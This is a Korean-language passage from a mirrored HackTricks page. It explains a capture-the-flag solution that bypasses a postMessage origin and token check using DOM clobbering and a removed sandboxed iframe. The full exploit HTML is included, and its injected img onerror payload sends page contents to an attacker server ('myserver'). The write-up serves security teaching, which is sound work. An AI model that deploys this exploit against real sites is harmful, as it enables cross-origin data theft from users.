mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-03 09:59:40 +00:00
6.6 KiB
6.6 KiB
SOP 우회하기 - Iframes - 2
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!
- 사이버 보안 회사에서 일하시나요? 회사를 HackTricks에서 광고하거나 PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드하고 싶으신가요? SUBSCRIPTION PLANS를 확인해보세요!
- The PEASS Family를 발견해보세요. 독점적인 NFTs 컬렉션입니다.
- 공식 PEASS & HackTricks 스웨그를 얻으세요.
- 💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter에서 저를 팔로우하세요 🐦@carlospolopm.
- **해킹 팁을 공유하려면 hacktricks repo와 hacktricks-cloud repo**에 PR을 제출하세요.
SOP-2에서의 Iframes
이 도전 과제의 해결책에서 @Strellic_은 이전 섹션과 유사한 방법을 제안합니다. 확인해봅시다.
이 도전 과제에서 공격자는 다음을 우회해야 합니다:
if (e.source == window.calc.contentWindow && e.data.token == window.token) {
만약 그가 그렇게 한다면, 그는 **innerHTML
**을 사용하여 페이지에 작성될 HTML 콘텐츠와 함께 **postmessage
**를 보낼 수 있습니다. 이때 샌드박스 정책을 우회하는 방법은 **window.calc.contentWindow
**를 **undefined
**로 만들고 **e.source
**를 **null
**로 만드는 것입니다:
- **
window.calc.contentWindow
**는 사실상 **document.getElementById("calc")
**입니다. **<img name=getElementById />
**로 **document.getElementById
**를 덮어쓸 수 있습니다. (Sanitizer API -여기-에서 DOM clobbering 공격에 대한 보호를 위해 기본 상태로 구성되어 있지 않습니다). - 따라서 **
document.getElementById("calc")
**를 **<img name=getElementById /><div id=calc></div>
**로 덮어쓸 수 있습니다. 그러면 **window.calc
**는 **undefined
**가 됩니다. - 이제 **
e.source
**가undefined
또는 **null
**이 되어야 합니다 (==
대신===
가 사용되기 때문에 **null == undefined
**는 **True
**입니다). 이를 얻는 것은 "쉽습니다". iframe을 생성하고 그것에서 postMessage를 보내고 즉시 iframe을 제거하면 **e.origin
**은 **null
**이 됩니다. 다음 코드를 확인하세요.
let iframe = document.createElement('iframe');
document.body.appendChild(iframe);
window.target = window.open("http://localhost:8080/");
await new Promise(r => setTimeout(r, 2000)); // wait for page to load
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`);
document.body.removeChild(iframe); //e.origin === null
두 번째 확인을 우회하기 위해 **token
**의 값으로 null
을 보내고 **window.token
**의 값을 **undefined
**로 만드는 방법은 다음과 같습니다:
null
값을 가진token
을 postMessage로 보내는 것은 간단합니다.- **
window.token
**은 **document.cookie
**를 사용하는getCookie
함수를 호출합니다.null
출처 페이지에서 **document.cookie
**에 접근하는 경우 오류가 발생합니다. 이로 인해 **window.token
**의 값은 **undefined
**가 됩니다.
<html>
<body>
<script>
// Abuse "expr" param to cause a HTML injection and
// clobber document.getElementById and make window.calc.contentWindow undefined
open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');
function start(){
var ifr = document.createElement('iframe');
// Create a sandboxed iframe, as sandboxed iframes will have origin null
// this null origin will document.cookie trigger an error and window.token will be undefined
ifr.sandbox = 'allow-scripts allow-popups';
ifr.srcdoc = `<script>(${hack})()<\/script>`
document.body.appendChild(ifr);
function hack(){
var win = open('https://obligatory-calc.ctf.sekai.team');
setTimeout(()=>{
parent.postMessage('remove', '*');
// this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
// token=null equals to undefined and e.source will be null so null == undefined
win.postMessage({token:null, result:"<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>"}, '*');
},1000);
}
// this removes the iframe so e.source becomes null in postMessage event.
onmessage = e=> {if(e.data == 'remove') document.body.innerHTML = ''; }
}
setTimeout(start, 1000);
</script>
</body>
</html>
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!
- 사이버 보안 회사에서 일하시나요? 회사를 HackTricks에서 광고하고 싶으신가요? 아니면 PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드하고 싶으신가요? SUBSCRIPTION PLANS를 확인해보세요!
- The PEASS Family를 발견해보세요. 독점적인 NFT 컬렉션입니다.
- 공식 PEASS & HackTricks 스웨그를 얻으세요.
- 💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter에서 저를 팔로우하세요 🐦@carlospolopm.
- **해킹 트릭을 공유하려면 hacktricks repo 및 hacktricks-cloud repo**에 PR을 제출하세요.